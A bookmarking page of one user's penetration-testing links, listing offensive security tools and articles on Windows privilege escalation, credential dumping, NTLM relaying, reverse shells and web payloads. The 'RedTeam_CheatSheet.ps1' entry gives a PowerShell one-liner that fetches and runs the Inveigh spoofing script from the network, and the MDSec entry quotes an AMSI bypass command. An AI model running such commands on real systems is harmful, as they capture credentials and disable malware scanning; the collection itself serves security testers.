whip_lash : pentest   407

Rotten Potato | Penetration Testing Lab
However there is a technique which can be used that tries to trick the “NT Authority\System” account to negotiate and authenticate via NTLM locally so the token for the “NT Authority\System” account would become available and therefore privilege escalation possible. This technique is called Rotten Potato and it was introduced in DerbyCon 2016 by Stephen Breen and Chris Mallz.
windows  privesc  privilegeescalation  pentest  security 
yesterday by whip_lash
GitHub - quentinhardy/odat: ODAT: Oracle Database Attacking Tool
ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.
oracle  database  pentest  security  tool 
yesterday by whip_lash
GitHub - ZerBea/hcxdumptool: Small tool to capture packets from wlan devices.
Favorite tweet:

hcxdumptool : Small tool to capture packets from wlan devices : https://t.co/b4f9XTLaVQ

— Binni Shah (@binitamshah) August 11, 2018
wifi  pentest 
7 days ago by whip_lash
infodox/python-pty-shells: Python PTY backdoors - full PTY or nothing!
The following is a collection of bind and reverse shells which give you a fully working PTY.

This is far superior to a normal bind or reverse shell, as you have job control and an interactive PTY and can do such things as use nano/vi to write files, su to elevate privs/change user, and ssh onward. You can also CTRL+C and suchlike.
pentest  reverseshell  tty 
13 days ago by whip_lash
JSON Web Tokens - jwt.io
JSON Web Tokens are an open, industry standard RFC 7519 method for representing claims securely between two parties.

JWT.IO allows you to decode, verify and generate JWT.
authentication  javascript  json  security  webapp  pentest 
15 days ago by whip_lash
GitHub - pentestmonkey/pysecdump: Python-based tool to dump security information from Windows systems
pysecdump is a python tool to extract various credentials and secrets from running Windows systems. It currently extracts:

LM and NT hashes (SYSKEY protected)
Cached domain passwords
LSA secrets
Secrets from Credential Manager (only some)
pentest  security  tool 
17 days ago by whip_lash
maK-/parameth: This tool can be used to brute discover GET and POST parameters
This tool can be used to brute discover GET and POST parameters

Often when you are busting a directory for common files, you can identify scripts (for example test.php) that look like they need to be passed an unknown parameter. This hopefully can help find them.
pentest  webapp 
18 days ago by whip_lash
danielmiessler/RobotsDisallowed: A harvest of the Disallowed directories from the robots.txt files of the world's top websites.
The RobotsDisallowed project is a harvest of the Disallowed directories from the robots.txt files of the world's top websites--specifically the Alexa 100K.

This list of Disallowed directories is a great way to supplement content discovery during a web security assessment, since the website owner is basically saying "Don't go here; there's sensitive stuff in there!".
pentest  webapp  wordlist  gobuster 
18 days ago by whip_lash
GerbenJavado/LinkFinder: A python script that finds endpoints in JavaScript files
LinkFinder is a python script written to discover endpoints and their parameters in JavaScript files. This way penetration testers and bug hunters are able to gather new, hidden endpoints on the websites they are testing, resulting in new testing ground, possibly containing new vulnerabilities.
javascript  pentest  webapp 
18 days ago by whip_lash
Retire.js
There is a plethora of JavaScript libraries for use on the web and in node.js apps out there. This greatly simplifies development, but we need to stay updated on security fixes. "Using Components with Known Vulnerabilities" is now a part of the OWASP Top 10 and insecure libraries can pose a huge risk for your webapp. The goal of Retire.js is to help you detect use of versions with known vulnerabilities.
javascript  security  pentest  webapp 
18 days ago by whip_lash
GitHub - s0md3v/Photon: Incredibly fast crawler which extracts urls, emails, files, website accounts and much more.
Photon is a lightning fast web crawler which extracts URLs, files, intel & endpoints from a target.

160 requests per second while extensive data extraction is just another day for Photon!
python  security  tools  web  recon  pentest 
18 days ago by whip_lash
x90skysn3k/brutespray: Brute-Forcing from Nmap output - Automatically attempts default creds on found services.
BruteSpray takes nmap GNMAP/XML output and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.
bruteforce  defaultcreds  pentest 
19 days ago by whip_lash
vysec/DomLink: A tool to link a domain with registered organisation names and emails, to other domains.
DomLink is a tool that uses a domain name to discover organisation name and associated e-mail address to then find further associated domains.

This is useful for bug bounty and red team engagements where you need to discover more domains associated with the target.
recon  dns  pentest 
19 days ago by whip_lash
presidentbeef/brakeman: A static analysis security vulnerability scanner for Ruby on Rails applications
Brakeman is a static analysis tool which checks Ruby on Rails applications for security vulnerabilities.
rails  ruby  analysis  git  recon  pentest 
19 days ago by whip_lash
PyCQA/bandit: Bandit is a tool designed to find common security issues in Python code.
Bandit is a tool designed to find common security issues in Python code. To do this Bandit processes each file, builds an AST from it, and runs appropriate plugins against the AST nodes. Once Bandit has finished scanning all the files it generates a report.
git  recon  pentest  python  analysis 
19 days ago by whip_lash
appsecco/bugcrowd-levelup-subdomain-enumeration: This repository contains all the material from the talk "Esoteric sub-domain enumeration techniques" given at Bugcrowd LevelUp 2017 virtual conference
cheatsheet.pdf - cheat sheet on the sub-domain enumeration techniques covered in the talk
cloudflare_enum.py - A script to do DNS enumeration using Cloudflare service
crt_psql.sh - Extract sub-domains for a given domain using crt.sh postgres interface
esoteric_subdomain_enumeration_techniques.pdf - Slides from the talk
subdomain_enum_censys.py - Extract sub-domains for a given domain using Censys.io API
subdomain_enum_crtsh.py - Extract sub-domains for a given domain using crt.sh RSS feed
subdomain_wordlist.txt - A collection of sub-domain names (around 3 million)
dns  recon  enumeration  pentest 
19 days ago by whip_lash
Love letters from the red team: from e-mail to NTLM hashes with Microsoft Outlook
Even though all it takes to exploit the issue is the ability to send an HTML e-mail, meaning it is possible to use any e-mail client or even a script to automate this attack, in this section we will describe how to achieve this using Microsoft Outlook itself.
responder  outlook  hash  email  pentest 
20 days ago by whip_lash
Bring Your Own Land (BYOL) – A Novel Red Teaming Technique « Bring Your Own Land (BYOL) – A Novel Red Teaming Technique | FireEye Inc
In this blog post, I will discuss an alternative to current LotL techniques. With the most current build of Cobalt Strike (version 3.11), it is now possible to execute .NET assemblies entirely within memory by using the “execute-assembly” command. By developing custom C#-based assemblies, attackers no longer need to rely on the tools present on the target system; they can instead write and deliver their own tools, a technique I call Bring Your Own Land (BYOL).
cobaltstrike  byol  c#  pentest 
21 days ago by whip_lash
Web Application Penetration Testing Tool: Tracy
Tracy is a pentesting tool designed to assist with finding all sinks and sources of a web application and display these results in a digestible manner. tracy should be used during the mapping-the-application phase of the pentest to identify sources of input and their corresponding outputs. tracy can use this data to intelligently find vulnerable instances of XSS, especially with web applications that use lots of JavaScript.
webapp  pentest  xss 
21 days ago by whip_lash
exploitexcel.png (1272×694)
Which privesc exploits work on which Windows versions
Windows  exploits  pentest  privesc  privilegeescalation 
21 days ago by whip_lash
LFISuite/pathtotest.txt at master · D35m0nd142/LFISuite
Useful files to retrieve from a Linux system if you have an LFI or XXE.
lfi  xxe  pentest 
27 days ago by whip_lash
swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF
A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques! I <3 pull requests :)
hacking  security  webapp  payloads  pentest 
27 days ago by whip_lash
The PowerView PowerUsage Series #1 – harmj0y
PowerView is probably my favorite bit of code I’ve written, and definitely the one I most regularly use (as evidenced by my recent posts). My team also heavily utilizes the toolkit, and we’ve come up with some cool uses for it over the past several years. For a long time I’ve wanted to share some of the real “power” uses of PowerView, like the PowerView “tricks” highlighted here.
powerview  pentest  powershell 
4 weeks ago by whip_lash
Invoke-PowerThIEf/README.md at master · nettitude/Invoke-PowerThIEf
Automatically scan any Windows or tabs for login forms and then record what gets posted. A notification will appear when some have arrived.
ie  powershell  pentest  postexploitation 
4 weeks ago by whip_lash
RedTeam_CheatSheet.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y"
hacking  pentest  security 
4 weeks ago by whip_lash
SANS Penetration Testing | Pen Test Poster: "White Board" - Bash - Useful IPv6 Pivot | SANS Institute
IPv6 brings a lot of changes, many of which are relevant from a security perspective. It also brings with it unique potential for added vulnerable space that can be leveraged in network compromises. IPv6 is not well understood and prone to misconfiguration. During security assessments, I've seen these settings result in critical security vulnerabilities including a firewall configured to provide carte blanche access to the entire network for all traffic using IPv6. Operating in IPv6 and taking advantage of these weaknesses is a key opportunity for pentesters.
ipv6  pentest  security 
5 weeks ago by whip_lash
Update to ProxyCannon — #_shellntel
We've cleaned up the number of arguments required to run the app from 6 to 3. Now you only need to specify the AMI KEY, AMI ID, and the number of instances you'd like to start.
proxycannon  pentest 
6 weeks ago by whip_lash
Hexacorn | Blog
If you run ‘powershell <0x2000 spaces> calc’ you will spawn Windows Calculator.

What will you see in the logs?

This:

JUST A POWERSHELL COMMANDLINE
obfuscation  logging  pentest  windows  security 
7 weeks ago by whip_lash
Bypassing SQL Server Logon Trigger Restrictions
Occasionally we come across a SQL Server backend that only allows connections from a predefined list of hostnames or applications. Usually those types of restrictions are enforced through logon triggers. In this blog I’ll show how to bypass those restrictions by spoofing hostnames and application names using lesser known connection string properties.
database  pentest  security  mssql  MySQL  sql 
7 weeks ago by whip_lash
SANS Penetration Testing | Modern Web Application Penetration Testing Part 1, XSS and XSRF Together | SANS Institute
Now the code. The important parts are getting the script to run; we used a body onload. The script runs each one of the forms. The forms each contain one of the XSRF attacks. Each form loads in a different iframe. The first one runs, then the second one waits for the iframe onload to fire before it runs, and so on. Victim logs in, they check their queue, the XSS runs, the XSRF runs, they have lost control of the application, attacker wins, or in this case a very effective demonstration of risk.
xss  csrf  xsrf  webapp  pentest 
7 weeks ago by whip_lash
Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes) // byt3bl33d3r // /dev/random > blog.py
This article is going to be talking about what you can do with Net-NTLM in modern windows environments.
hash  ntlm  relay  windows  pentest  security 
7 weeks ago by whip_lash
SANS Penetration Testing | SMB Relay Demystified and NTLMv2 Pwnage with Python | SANS Institute
But, don't worry. We've got you covered. Until then, it is PYTHON TO THE RESCUE! Two weeks ago, I showed you psexec.py in my blog post about using a Python version of psexec at http://pen-testing.sans.org/blog/2013/03/27/psexec-python-rocks. It is a Python implementation of psexec that is distributed with the IMPACKET modules. The team writing the IMPACKET module for Python is doing some really awesome work. First of all, the modules they have written are awesome. Beyond that, they have created several example programs that demonstrate the power of their Python modules. Best of all, the SMBRELAYX.PY script that comes with IMPACKET supports NTLMv2! Sweetness, thy name is IMPACKET!
impacket  python  security  smb  relay  ntlm  hash  script  pentest 
7 weeks ago by whip_lash
calebmadrigal/trackerjacker: Like nmap for mapping wifi networks you're not connected to, plus device tracking
Like nmap for mapping wifi networks you're not connected to. Maps and tracks wifi networks and devices through raw 802.11 monitoring.
network  python  security  wifi  wireless  pentest  github 
7 weeks ago by whip_lash
sense-of-security/ADRecon: ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.
ADRecon is a tool which extracts various artifacts (as highlighted below) out of an AD environment in a specially formatted Microsoft Excel report that includes summary views with metrics to facilitate analysis.
security  pentest  activedirectory  github 
7 weeks ago by whip_lash
SANS Penetration Testing | Modern Web Application Penetration Testing Part 2, Hash Length Extension Attacks | SANS Institute
Favorite tweet:

SANS | #PenTest Blog

Modern Web App Pen Testing Part 2, Hash Length Extension Attacks
by @adriendb (SEC642)

Blog: https://t.co/8TR2Z7OKYu pic.twitter.com/3YA3ncesym

— SANS Pen Test (@SANSPenTest) June 28, 2018
hashextension  hash  webapp  pentest  security 
7 weeks ago by whip_lash
Microsoft COM for Windows - Privilege Escalation
The keywords "COM" and "serialized" pretty much jumped into my face when the advisory came out. Since I had already spent several months of research time on Microsoft COM last year I decided to look into it. Although the vulnerability can result in remote code execution, I'm only interested in the privilege escalation aspects.
privesc  windows  pentest  exploit  security 
7 weeks ago by whip_lash
Apply MITRE’s ‘ATT&CK’ Model to Check Your Defenses | McAfee Blogs
In this post, we highlighted one approach and application of the ATT&CK model. There are many ways to apply it for red teaming, threat hunting, and other tasks. At McAfee we embrace the model and are applying it to different levels and purposes in our organization. We are not only using it but also contribute to the model by describing newly discovered techniques used by adversaries.
pentest  security 
8 weeks ago by whip_lash
Mimikatz 2.0 - Golden Ticket Walkthrough - Projects - Beneath the Waves
The "executive summary" version of a Golden Ticket is that if you can obtain one of the encryption keys used by the krbtgt account for an Active Directory domain, Mimikatz 2.0 will allow you to forge arbitrary Kerberos authentication tickets for that domain. Those keys are not easily-obtained — unless someone has left an NTDS.DIT backup lying around, it probably requires access to a domain admin account's credentials — so the Golden Ticket functionality is sort of like the "New Game+" mode in the Silent Hill series: you've already won, and now you can play through again as an unstoppable juggernaut with a laser pistol and/or chainsaw.
activedirectory  mimikatz  goldenticket  pentest  security 
8 weeks ago by whip_lash
Exploring PowerShell AMSI and Logging Evasion – MDSec
Before attempting to load a script, it has now become commonplace to run the following AMSI bypass:
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
But have you ever wondered just how this magic command goes about unhooking AMSI?
In this post, we will walk through just how this technique works under the hood, then we will look at a few alternate ways to unhook AMSI from PowerShell.
amsi  powershell  pentest 
8 weeks ago by whip_lash
One-Lin3r v1.1 - Gives You One-Liners That Aids In Penetration Testing Operations - KitPloit - PenTest Tools for your Security Arsenal ☣
Favorite tweet:

#OneLin3r v1.1 - Gives You One-Liners That Aids In Penetration #Testing Operations https://t.co/AWvpLnt1ND pic.twitter.com/74zGjoV9Ve

— ☣ The Hacker Tools (@KitPloit) June 14, 2018
pentest  security  tool 
8 weeks ago by whip_lash